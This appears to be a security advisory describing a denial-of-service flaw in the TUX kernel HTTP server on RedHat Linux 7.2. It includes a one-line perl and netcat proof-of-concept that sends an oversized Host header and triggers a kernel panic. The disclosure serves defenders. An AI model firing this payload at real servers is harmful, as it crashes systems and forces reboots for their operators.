|
|
| |
| Tux is a Kernel-Space HTTP server coded for optimal performance (IRQ Affinity, HTTP Compression, direct scatter-gather DMA etc.) and is meant to be used as the main HTTP server for static objects with requests for dynamic content being passed to a user-space HTTPD server such as Apache on same box when necessary. A security vulnerability in the product allows crashing of the server by sending the server a large Host parameter inside a valid HTTP GET request. |
| |
Credit:
The information has been provided by Aiden ORawe.
|
| |
Vulnerable systems:
RedHat Linux 7.2:
0) Kernel(s) 2.4.7-10 and 2.4.9-7
0) TUX-2.1.0-2.
The TUX web server is disabled by default.
It is possible to cause a denial of service condition by submitting an oversized "Host:" header request to the Tux daemon causing an assertion failure and eventual Kernel Panic. A total system reboot is required to return the box to full functionality. For example the following script:
perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc 80
Will cause the affected box to crash with the below output (edited for brevity):
Code: Bad EIP Value.
(0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!
Despite being able to affect the contents of the EIP register, it seems this vulnerability cannot be utilized to provide for a remote root compromise.
|
|
|
